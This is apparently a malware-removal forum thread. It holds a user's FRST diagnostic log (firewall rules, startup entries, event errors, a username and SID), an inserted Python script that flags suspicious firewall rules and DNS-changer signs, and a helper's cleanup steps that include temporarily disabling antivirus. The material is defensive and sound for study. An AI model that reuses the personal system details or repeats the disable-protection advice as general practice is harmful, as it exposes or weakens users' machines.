2014-05-20 19:28 - 2015-01-10 09:07 - 00011920 _____ () C:\Program Files (x86)\NVIDIA Corporation\CoProcManager\detoured.dll
2015-03-29 22:57 - 2015-12-25 20:47 - 50679920 _____ () C:\Users\Simon\AppData\Roaming\Spotify\libcef.dll
2015-03-29 22:57 - 2015-12-25 20:47 - 01882224 _____ () C:\Users\Simon\AppData\Roaming\Spotify\libglesv2.dll
2015-03-29 22:57 - 2015-12-25 20:47 - 00082544 _____ () C:\Users\Simon\AppData\Roaming\Spotify\libegl.dll
2015-12-25 23:21 - 2015-12-25 23:21 - 17647296 _____ () C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_235.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys => ""="Driver"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Simon\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Killer Network Manager.lnk => C:\Windows\pss\Killer Network Manager.lnk.CommonStartup
MSCONFIG\startupreg: Andy => C:\Program Files\Andy\HandyAndy.exe
MSCONFIG\startupreg: Box Edit => C:\Users\Simon\AppData\Local\Box\Box Edit\Box Edit.exe
MSCONFIG\startupreg: Box Local Com Server => C:\ProgramData\Box\ComServer\Box Local Com Service.exe
MSCONFIG\startupreg: BrowserChoice => "C:\Windows\System32\browserchoice.exe" /run
MSCONFIG\startupreg: Gyazo => C:\Program Files (x86)\Gyazo\GyStation.exe
MSCONFIG\startupreg: NvBackend => "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
MSCONFIG\startupreg: Spotify => "C:\Users\Simon\AppData\Roaming\Spotify\Spotify.exe" /uri spotify:autostart
MSCONFIG\startupreg: Spotify Web Helper => "C:\Users\Simon\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"
MSCONFIG\startupreg: SteelSeries Engine => C:\Program Files\SteelSeries\SteelSeries Engine\SteelSeriesEngine.exe
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: Unified Remote v2 => C:\Users\Simon\Desktop\Ny mappe\RemoteServer.exe

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{AB2FEE24-8032-4E9E-92DA-64BB088FC41E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{F106D850-6184-4BD8-BEB3-45242004BC35}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{4E1B0C1D-5364-4F99-BD4A-ECCE74031C0A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{CB0C4F41-C187-4A1D-85F9-A69FF8D5CFEC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{13CAF80E-3321-4614-9CE3-74F2162BE597}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{31EDFDEA-FAEA-43B6-9F03-FE691930B95F}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{A75C6E01-BECE-4F00-AA03-723A57B19147}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{98D1DBBE-BEA5-433E-9CA6-0B1714ACD936}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{B23CBBCF-50A7-478B-809F-83E2FDF83FD1}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [{E4C6D351-DAD8-4220-BC6C-DE73EEA7C6DB}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{270EABF0-B2D9-4597-B0A7-F75061F48CA0}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [TCP Query User{BC3E98B8-D846-4D9F-8D92-6A5BA3495D70}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{66E7805C-67FB-47F1-A39F-0C47A01EE572}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [{4792FD49-5934-42CF-AAD3-73DEA7C5F851}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{409438CE-1684-45DD-95EA-6864DB5687E7}] => (Allow) LPort=2869
FirewallRules: [{2A1A026D-FFE9-4073-9BA4-45010D1B2086}] => (Allow) LPort=1900
FirewallRules: [TCP Query User{2C940A19-ACA9-41D0-B0E6-8F10E1832352}C:\users\simon\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\simon\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{099A47F4-D1F0-4242-A024-AC85A7DA0C05}C:\users\simon\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\simon\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{4046ED15-B5DC-44FE-AF82-CC6544125AB4}C:\users\simon\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\simon\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{61F78399-B7D2-4F40-8272-FA2FE8A5D8A8}C:\users\simon\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\simon\appdata\roaming\spotify\spotify.exe
FirewallRules: [{7C2A5245-8A80-4ACE-82CF-10DE7EAC0228}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{F35C17EE-A6B7-4485-A687-C311E3392A94}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{98406585-EE39-4584-BD3F-F1BF414A0CC5}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{5554D9CC-7BD0-453A-AC47-BD705640C175}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{AD7C4BAF-9C55-4CE0-A596-801278A9614F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{A5B089B6-F6E2-4203-ABFD-A28E27B8B359}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{6BEFAD78-3D5C-4F18-9538-5A4C7CC3E0E9}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{0171AADA-49AA-4CDA-98B9-B7F5F5A75E44}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{FFE9D83D-7E4B-401D-84A3-5A947D59C412}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{086EA29B-9325-4BDB-B314-5EE46E605002}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{FF876EF3-52B9-4C91-9477-27F3E6247D4E}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [TCP Query User{F2BBEFF5-FBA0-4432-B006-BE4E6540F707}C:\program files\tixati\tixati.exe] => (Allow) C:\program files\tixati\tixati.exe
FirewallRules: [UDP Query User{68543947-F16B-448E-9BE6-88FB44857456}C:\program files\tixati\tixati.exe] => (Allow) C:\program files\tixati\tixati.exe
FirewallRules: [{65714679-8478-4C66-92EF-1A3A0C03545C}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe
FirewallRules: [{98C0C0B1-31F6-41CF-9811-E3C54F0E8270}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe
FirewallRules: [{5EABEC4E-1B3F-493C-B50D-42F2D2BCB79C}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe
FirewallRules: [{2825A6B2-A9EA-4B3D-81D2-6E7A4E146574}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe
FirewallRules: [TCP Query User{0D481072-C761-4FB2-89F0-45AF6B6C9C3D}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{6C5190FB-1903-4387-9DE6-9A16CB3879CE}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [TCP Query User{EA980882-35BE-47B4-A19B-2FD475CA6AB1}C:\program files (x86)\popcorn time\chromecast\node.exe] => (Allow) C:\program files (x86)\popcorn time\chromecast\node.exe
FirewallRules: [UDP Query User{1850CB56-D20F-4122-B53B-54A493C90733}C:\program files (x86)\popcorn time\chromecast\node.exe] => (Allow) C:\program files (x86)\popcorn time\chromecast\node.exe
FirewallRules: [{E7C2471B-B7D0-48B6-95F1-9797E71B957E}] => (Block) C:\program files (x86)\popcorn time\chromecast\node.exe
FirewallRules: [{ECB90B53-400F-4524-8D1B-261DDE021B0F}] => (Block) C:\program files (x86)\popcorn time\chromecast\node.exe
FirewallRules: [{1A445CA6-6818-4425-9939-793C713D4CD8}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{11EF1017-59B8-44AA-8733-6441A42883A5}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{FB3936F5-A285-43E9-8E89-73B271B60BFE}] => (Allow) LPort=5556
FirewallRules: [{CF260196-7A31-4F17-BD1A-4A124C939586}] => (Allow) LPort=5558
FirewallRules: [{42715D29-0E28-4043-949D-57D4E66AC21F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{6D63373F-B12C-4589-8D9E-5EED49E92CBA}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{FAF73EE2-2C47-421B-829B-2B7CA0BEABD9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{E463B906-D4E7-4F07-BDCD-45B6B4A8CBF1}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\GarrysMod\hl2.exe
FirewallRules: [{07335363-4A29-4B87-B8BA-897571D157C3}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\GarrysMod\hl2.exe
FirewallRules: [TCP Query User{58C9069B-3C00-44AD-924E-4366110F65CB}C:\program files\tixati\tixati.exe] => (Block) C:\program files\tixati\tixati.exe
FirewallRules: [UDP Query User{FBB2681F-4FF7-4AC6-B5DD-7D541FFB0DF2}C:\program files\tixati\tixati.exe] => (Block) C:\program files\tixati\tixati.exe
FirewallRules: [{2E9338DD-C557-4FCD-8ABF-081E0E5CE611}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

03-01-2015 18:09:51 Windows Update
07-01-2015 11:48:05 Windows Update
11-01-2015 23:29:09 Installed Box Edit
17-01-2015 13:52:54 Windows Update
18-01-2015 01:52:06 Windows Update
22-01-2015 20:56:02 Windows Update
28-01-2015 23:19:10 Windows Update
09-02-2015 19:51:33 Windows Update
10-02-2015 15:08:07 Windows Defender Checkpoint
20-03-2015 07:36:02 Windows Update
13-04-2015 22:25:56 Windows Modules Installer
13-04-2015 22:28:58 Windows Modules Installer
13-04-2015 22:43:24 Windows Update
14-04-2015 01:59:55 Removed Bonjour
14-04-2015 02:00:17 Windows Update
14-04-2015 07:35:42 Installed DirectX
16-04-2015 17:05:09 Windows Defender Checkpoint
17-04-2015 06:28:06 Windows Update
21-04-2015 15:23:14 Windows Update
25-04-2015 01:10:40 Windows Update
28-04-2015 22:13:02 Windows Update
04-05-2015 13:57:55 Windows Update
05-05-2015 13:38:54 Windows Defender Checkpoint
16-05-2015 02:50:08 Windows Update
17-05-2015 00:35:34 Installed DirectX
17-05-2015 01:48:39 Windows Update
20-05-2015 22:17:42 Windows Update
26-05-2015 13:34:14 Windows Update
02-06-2015 10:22:40 Windows Update
05-06-2015 10:26:15 Windows Update
09-06-2015 06:44:26 Windows Update
10-06-2015 22:10:45 Windows Update
13-06-2015 23:49:57 Installed DirectX
16-06-2015 18:07:50 Windows Update
18-06-2015 02:30:18 Windows Defender Checkpoint
23-06-2015 17:49:41 Windows Update
28-06-2015 17:18:39 Windows Update
03-07-2015 11:52:32 Windows Update
07-07-2015 09:04:10 Windows Update
16-07-2015 12:42:09 Windows Update
26-07-2015 02:02:33 Windows Modules Installer
26-07-2015 23:37:24 Windows Update
27-07-2015 01:05:15 Windows Update
30-07-2015 03:27:55 Windows Update
30-07-2015 03:55:25 Windows Update
03-08-2015 19:26:35 Windows Update
11-08-2015 13:24:46 Windows Update
10-10-2015 01:42:20 Windows Update
10-10-2015 01:55:52 Windows Update
11-10-2015 02:53:39 Windows Update
27-10-2015 01:21:50 Windows Modules Installer
01-11-2015 02:14:41 Windows Update
01-11-2015 03:02:02 Windows Update
13-11-2015 19:14:13 Windows Update
17-11-2015 01:18:30 Windows Update
07-12-2015 03:25:33 Windows Update
07-12-2015 05:05:11 Windows Update
23-12-2015 02:12:31 Windows Update
23-12-2015 03:00:11 Windows Update
25-12-2015 21:52:17 JRT Pre-Junkware Removal
25-12-2015 21:52:35 ComboFix created restore point
25-12-2015 22:14:12 JRT Pre-Junkware Removal

==================== Faulty Device Manager Devices =============

Name: My Book Live Network Storage
Description: My Book Live Network Storage
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Ethernet Controller
Description: Ethernet Controller
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (12/25/2015 10:10:50 PM) (Source: NvStreamSvc) (EventID: 2001) (User: )
Description: NvStreamSvcNvVAD initialization failed [6]

Error: (12/25/2015 10:10:50 PM) (Source: NvStreamSvc) (EventID: 2001) (User: )
Description: NvStreamSvcFailed to set NvVAD endpoint as default Audio endpoint [0]

Error: (12/25/2015 10:10:50 PM) (Source: NvStreamSvc) (EventID: 2001) (User: )
Description: NvStreamSvcNvVAD endpoint registration failed [0]

Error: (12/25/2015 09:49:27 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program AdwCleaner.exe version 5.0.2.6 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: b64

Start Time: 01d13f556d372a67

Termination Time: 2

Application Path: C:\Users\Simon\Desktop\Malware\AdwCleaner.exe

Report Id: f3f89292-ab48-11e5-94ca-a088696cbf14

Error: (12/25/2015 09:49:12 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program mbam.exe version 2.3.125.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 1754

Start Time: 01d13f559e1de315

Termination Time: 10

Application Path: C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe

Report Id: f14612a6-ab48-11e5-94ca-a088696cbf14

Error: (12/25/2015 09:14:32 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: mbam.exe, version: 1.0.0.532, time stamp: 0x53518532
Faulting module name: MSVCR100.dll, version: 10.0.40219.325, time stamp: 0x4df2be1e
Exception code: 0x40000015
Fault offset: 0x0008d6fd
Faulting process id: 0x180c
Faulting application start time: 0xmbam.exe0
Faulting application path: mbam.exe1
Faulting module path: mbam.exe2
Report Id: mbam.exe3

Error: (12/25/2015 09:13:31 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: mbam.exe, version: 1.0.0.532, time stamp: 0x53518532
Faulting module name: MSVCR100.dll, version: 10.0.40219.325, time stamp: 0x4df2be1e
Exception code: 0x40000015
Fault offset: 0x0008d6fd
Faulting process id: 0x7bc
Faulting application start time: 0xmbam.exe0
Faulting application path: mbam.exe1
Faulting module path: mbam.exe2
Report Id: mbam.exe3

Error: (12/25/2015 09:09:50 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: rundll32.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc637
Faulting module name: KERNELBASE.dll, version: 6.1.7601.19045, time stamp: 0x56258f05
Exception code: 0xe06d7363
Fault offset: 0x0000c42d
Faulting process id: 0x1bf8
Faulting application start time: 0xrundll32.exe0
Faulting application path: rundll32.exe1
Faulting module path: rundll32.exe2
Report Id: rundll32.exe3

Error: (12/25/2015 09:07:16 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: mbam.exe, version: 1.0.0.532, time stamp: 0x53518532
Faulting module name: MSVCR100.dll, version: 10.0.40219.325, time stamp: 0x4df2be1e
Exception code: 0x40000015
Fault offset: 0x0008d6fd
Faulting process id: 0x19a4
Faulting application start time: 0xmbam.exe0
Faulting application path: mbam.exe1
Faulting module path: mbam.exe2
Report Id: mbam.exe3

Error: (12/25/2015 09:04:59 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program Spotify.exe version 1.0.20.94 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: aac

Start Time: 01d13f4d65b8c14d

Termination Time: 2

Application Path: C:\Users\Simon\AppData\Roaming\Spotify\Spotify.exe

Report Id: c3b2fbbb-ab42-11e5-9458-a088696cbf14


System errors:
=============
Error: (12/25/2015 11:37:08 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-MYNDIGHET)
Description: An error occurred while attempting to read the local hosts file.

Error: (12/25/2015 11:37:06 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-MYNDIGHET)
Description: An error occurred while attempting to read the local hosts file.

Error: (12/25/2015 11:37:05 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-MYNDIGHET)
Description: An error occurred while attempting to read the local hosts file.

Error: (12/25/2015 11:37:02 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-MYNDIGHET)
Description: An error occurred while attempting to read the local hosts file.

Error: (12/25/2015 11:36:10 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Steam Client Service service failed to start due to the following error: 
%%1053

Error: (12/25/2015 11:36:10 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Steam Client Service service to connect.

Error: (12/25/2015 11:34:32 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-MYNDIGHET)
Description: An error occurred while attempting to read the local hosts file.

Error: (12/25/2015 11:33:22 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-MYNDIGHET)
Description: An error occurred while attempting to read the local hosts file.

Error: (12/25/2015 11:33:20 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-MYNDIGHET)
Description: An error occurred while attempting to read the local hosts file.

Error: (12/25/2015 11:33:20 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-MYNDIGHET)
Description: An error occurred while attempting to read the local hosts file.


CodeIntegrity:
===================================
  Date: 2015-12-25 22:00:26.834
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2015-12-25 22:00:26.787
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


==================== Memory info =========================== 

Processor: Intel(R) Core(TM) i7-4700HQ CPU @ 2.40GHz
Percentage of memory in use: 37%
Total physical RAM: 8112.24 MB
Available physical RAM: 5074.31 MB
Total Virtual: 16222.69 MB
Available Virtual: 13036.74 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:921.52 GB) (Free:370.2 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (DriverCD) (Fixed) (Total:10 GB) (Free:5.19 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 8BE4CCEC)
Partition 1: (Active) - (Size=921.5 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=10 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

Thanks for reading, hoping for some assistance as soon as possible!
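The Addition.txt above ends with the kinds of lines a helper reads first in a case like this: firewall Allow rules with a program path, the DNS-Client event 1012 errors about the hosts file, and, in the FRST.txt posted later in the thread, the Hosts, Tcpip name-server and Policies "ATTENTION" lines. The Python script below is an added example for this thread, not code from the original posts or from FRST itself. It parses log lines in FRST's format offline and flags the ones worth a second look. The sample log is constructed for the example: the {AAAAAAAA-...} rule and interface GUIDs, the 203.0.113.x name servers and the svc.exe path under AppData are invented to exercise the checks, and the list of "trusted" program directories is a simplification, not an FRST rule.

```python
import re
from dataclasses import dataclass

# Constructed sample in FRST's line format, modelled on the Addition.txt and FRST.txt
# lines posted in this thread. The {AAAAAAAA-...} identifiers, the 203.0.113.x name
# servers and the svc.exe rule are invented for the example.
SAMPLE_LOG = r"""
FirewallRules: [TCP Query User{EA980882-35BE-47B4-A19B-2FD475CA6AB1}C:\program files (x86)\popcorn time\chromecast\node.exe] => (Allow) C:\program files (x86)\popcorn time\chromecast\node.exe
FirewallRules: [{FB3936F5-A285-43E9-8E89-73B271B60BFE}] => (Allow) LPort=5556
FirewallRules: [{42715D29-0E28-4043-949D-57D4E66AC21F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{AAAAAAAA-0000-0000-0000-000000000001}] => (Allow) C:\Users\Simon\AppData\Roaming\updater\svc.exe
Hosts: Hosts file not detected in the default directory
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{4B93233A-B173-4539-92C3-0DD5545714B4}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{AAAAAAAA-0000-0000-0000-000000000002}: [NameServer] 203.0.113.10,203.0.113.11
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
"""

FW_RULE = re.compile(
    r"^FirewallRules: \[(?P<name>[^\]]+)\] => \((?P<action>Allow|Block)\) (?P<target>.+)$"
)
DNS_LINE = re.compile(
    r"^Tcpip\\(?:Parameters|\.\.\\Interfaces\\(?P<iface>\{[^}]+\})): "
    r"\[(?P<key>DhcpNameServer|NameServer)\] (?P<servers>.+)$"
)
# Simplification for the example: program paths outside these roots are user-writable.
TRUSTED_PREFIXES = ("c:\\program files", "c:\\windows")


@dataclass
class Finding:
    kind: str
    detail: str


def triage(log_text: str) -> list[Finding]:
    """Walk FRST/Addition.txt style lines and return indicators worth a second look."""
    findings: list[Finding] = []
    dhcp_servers: set[str] = set()
    static_servers: dict[str, set[str]] = {}

    for raw in log_text.splitlines():
        line = raw.strip()
        if not line:
            continue

        # FRST's own marker for policy keys, dev builds and similar anomalies.
        if "<======= ATTENTION" in line:
            findings.append(Finding("attention", line.split(" <=======")[0]))
            continue

        # A missing hosts file is what the DNS-Client event 1012 errors complain about.
        if line.startswith("Hosts:") and "not detected" in line:
            findings.append(Finding("hosts_missing", line))
            continue

        m = DNS_LINE.match(line)
        if m:
            servers = {s.strip() for s in m.group("servers").split(",") if s.strip()}
            if m.group("key") == "DhcpNameServer":
                dhcp_servers |= servers
            else:
                static_servers[m.group("iface") or "global"] = servers
            continue

        m = FW_RULE.match(line)
        if m and m.group("action") == "Allow":
            target = m.group("target")
            if target.lower().startswith("lport="):
                continue  # port-only rule, no program path to judge
            if not target.lower().startswith(TRUSTED_PREFIXES):
                findings.append(Finding("fw_allow_untrusted_path", target))

    # Static DNS servers that DHCP never handed out are the classic DNS-changer footprint.
    for iface, servers in static_servers.items():
        if not servers <= dhcp_servers:
            findings.append(Finding("static_dns", f"{iface}: {', '.join(sorted(servers))}"))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f.kind:24} {f.detail}")
```

The path heuristic only narrows the list: a rule under Program Files can still belong to software you do not want (the popcorn time node.exe rules in the log above are a case in point), so read the remaining rules by hand. For a DNS-changing adware the static-DNS and missing-hosts findings are the ones that matter; on the live machine you would confirm them with ipconfig /all and by checking whether %SystemRoot%\System32\drivers\etc\hosts exists at all.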




#2 Machiavelli
  • Agent 007
  • Malware Response Instructor
  • 4,114 posts
  • Gender: Male
  • Location: Germany

Posted 26 December 2015 - 09:08 AM

Hello swaykeb00b, welcome to Bleeping Computer's Malware Removal forum!

 
My name is Gerrit. I will be assisting you with your malware-related problems.
If you would allow me to call you by your first name I would prefer that.
 
======================================================
 
Please read through the points below to ensure this process moves as quickly and efficiently as possible.

  • Ensure you read through my instructions thoroughly, and carry out each step in the order specified.
  • Please do not run any tools or take any steps other than those I provide for you. Independent efforts may make matters worse, and will affect my ability to provide the best set of instructions for you.
  • Please backup important files before proceeding with my instructions. Malware removal can be unpredictable at times.   
  • If you come across any issues whilst following my instructions, please stop and inform me of the issue in as much detail as possible. Please do not hesitate to ask before proceeding.
  • Topics are locked if no response is made after 4 days. Please inform me if you require additional time to complete my instructions.
  • I will notify you when I believe your computer is free of malware. Please bear in mind, absence of symptoms does not necessarily correlate to absence of malware, so please wait until the "All Clean". 
  • Ensure you are following this topic. Click the follow button at the top of the page. 

======================================================

 

STEP 1
Junkware Removal Tool (JRT)

  • Please download Junkware Removal Tool and save the file to your Desktop.
  • Temporarily disable your anti-virus software. For instructions, please refer to the following link.
  • Right-Click JRT.exe and select Run as administrator to run the programme.
  • Follow the prompts and allow the scan to run uninterrupted. 
  • Upon completion, a log (JRT.txt) will open on your desktop.
  • Re-enable your anti-virus software.
  • Copy the contents of JRT.txt and paste in your next reply.
     

STEP 2

AdwCleaner

  • Please download AdwCleaner and save the file to your Desktop.
  • Right-Click AdwCleaner.exe and select Run as administrator to run the programme.
  • Follow the prompts. 
  • Click Scan
  • Upon completion, click Logfile. A log (AdwCleaner[S1].txt) will open. Briefly check the log for anything you know to be legitimate. 
  • Ensure anything you know to be legitimate does not have a checkmark under the corresponding tab, and click Cleaning
  • Follow the prompts and allow your computer to reboot
  • After the reboot, a log (AdwCleaner[C1].txt) will open. Copy the contents of the log and paste in your next reply.

-- File and folder backups are made for items removed using this tool. Should a legitimate file or folder be removed (otherwise known as a 'false-positive'), simple steps can be taken to restore the item. Please do not overly concern yourself with the contents of AdwCleaner[S1].txt.

 

STEP 3
Malwarebytes Anti-Malware (MBAM)

  • Open Malwarebytes Anti-Malware and click Update Now.
  • Once updated, click the Settings tab, followed by Detection and Protection and tick Scan for rootkits.
  • Click the Scan tab, ensure Threat Scan is selected and click Start Scan.
  • Note: You may see the following message, "Could not load DDA driver". Click Yes, allow your PC to reboot and continue afterwards. 
  • If threats are detected, click Remove Selected. If you are prompted to reboot, click Yes.
  • Upon completion of the scan (or after the reboot), click the History tab.
  • Click Application Logs and double-click the Scan Log.
  • Click Copy to Clipboard and paste the log in your next reply. 

STEP 4
Farbar Recovery Scan Tool (FRST) Scan

  • Right-Click FRST.exe or FRST64.exe and select Run as administrator to run the programme.
  • Ensure the Addition.txt box is checked.
  • Click the Scan button and let the programme run.
  • Upon completion, click OK, then OK on the Addition.txt pop up screen.
  • Two logs (FRST.txt & Addition.txt) will now be open on your Desktop. Copy the contents of both logs and paste in your next reply. 

======================================================

STEP 5
Logs
In your next reply please include the following logs. Please be sure to copy and paste the requested logs, as well as provide information on any questions I may have asked.

  • JRT.txt
  • AdwCleaner[C1].txt
  • MBAM Log
  • FRST.txt & Addition.txt

~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.



